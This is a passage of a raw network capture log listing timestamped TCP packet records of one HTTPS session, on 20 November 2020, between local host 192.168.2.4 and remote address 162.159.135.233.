                                                                                                                                                Nov 20, 2020 11:26:39.654860973 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.654891968 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.654903889 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.654932022 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.654942989 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.654973984 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.654978991 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655014038 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655042887 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655055046 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655065060 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655097008 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655106068 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655143023 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655154943 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655188084 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655201912 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655229092 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655241966 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655271053 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655282974 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655313969 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655319929 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655355930 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655374050 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655406952 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655431986 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655448914 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655469894 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655492067 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655509949 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655534983 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655555964 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655582905 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655601025 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655626059 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655637026 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655668974 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655680895 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655714035 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655725956 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655755997 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655770063 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655798912 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655806065 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655839920 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655855894 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655879974 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655894995 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655920029 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655936956 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.655960083 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.655976057 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.656004906 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.656018972 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.656044006 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.656059027 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.656085968 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.656099081 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.656127930 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.656141996 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.656171083 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.656191111 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.656213045 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.656225920 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.656255960 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.656267881 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.656299114 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.656310081 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.656338930 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.656356096 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.656382084 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.656397104 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.656440020 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.656510115 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.656550884 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.656599045 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.656599998 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.656642914 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.656658888 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.656668901 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.656683922 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.656698942 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.656724930 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.656747103 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.656776905 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.656789064 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.656827927 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.656904936 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.656964064 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.656970024 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.657021046 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.657068968 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.657134056 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.657138109 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.657182932 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.657202005 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.657219887 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.657244921 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.657263041 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.657304049 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.657342911 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.657357931 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.657380104 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.657444954 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.657459021 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.657480955 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.657500982 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.657517910 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.657541037 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.657556057 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.657571077 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.657593012 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.657608032 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.657629967 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.657643080 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.657665968 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.657680035 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.657702923 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.657718897 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.657740116 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.657751083 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.657790899 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.669209003 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.669259071 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.669291973 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.669301033 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.669317961 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.669327974 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.669354916 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.669354916 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.669392109 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.669395924 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.669414043 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.669440031 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.669467926 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.669470072 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.669501066 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.669501066 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.669533014 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.669533968 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.669549942 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.669559956 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.669593096 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.669594049 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.669615030 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.669621944 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.669656038 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.669673920 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.674103975 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674201012 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674235106 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674253941 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.674268961 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674272060 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.674299955 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.674329996 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674360991 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674390078 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674421072 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674427032 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.674453020 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674474955 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674489021 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.674513102 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674537897 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674550056 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.674568892 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674602985 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674622059 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.674633980 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674637079 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.674665928 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674673080 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.674690008 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.674698114 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674715042 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.674731016 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674761057 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.674762964 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674773932 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.674798965 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674818039 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.674834967 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674856901 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.674866915 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674904108 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674933910 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.674936056 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674942017 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.674952030 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.674968958 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674995899 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.674998999 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675012112 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675034046 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675064087 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675065041 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675093889 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675097942 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675122976 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675133944 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675147057 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675156116 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675184965 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675190926 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675208092 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675215960 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675240040 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675246954 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675282001 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675302029 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675563097 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675595045 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675625086 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675630093 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675647974 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675652981 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675673008 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675684929 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675709963 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675717115 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675745964 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675749063 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675774097 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675782919 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675801992 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675810099 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675829887 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675846100 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675862074 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675863981 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675875902 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675889015 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675918102 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675919056 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675932884 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675945044 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675971031 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.675980091 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.675992966 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676012039 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676026106 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676038027 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676064014 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676073074 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676084042 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676103115 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676122904 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676132917 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676151037 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676162958 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676193953 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676194906 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676222086 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676228046 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676242113 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676259041 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676287889 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676291943 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676306009 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676318884 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676342964 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676351070 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676364899 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676378012 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676400900 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676412106 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676424026 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676444054 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676461935 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676470041 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676493883 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676501989 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676516056 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676533937 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676556110 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676563025 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676579952 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676590919 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676614046 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676624060 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676644087 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676646948 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676687002 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676702976 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676711082 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676717043 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676747084 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676774979 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676800966 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.676811934 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676821947 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.676861048 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.685930967 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.685982943 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.686014891 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.686017036 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.686038971 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.686043978 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.686068058 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.686078072 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.686090946 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.686113119 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.686142921 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.686146975 CET44349734162.159.135.233192.168.2.4
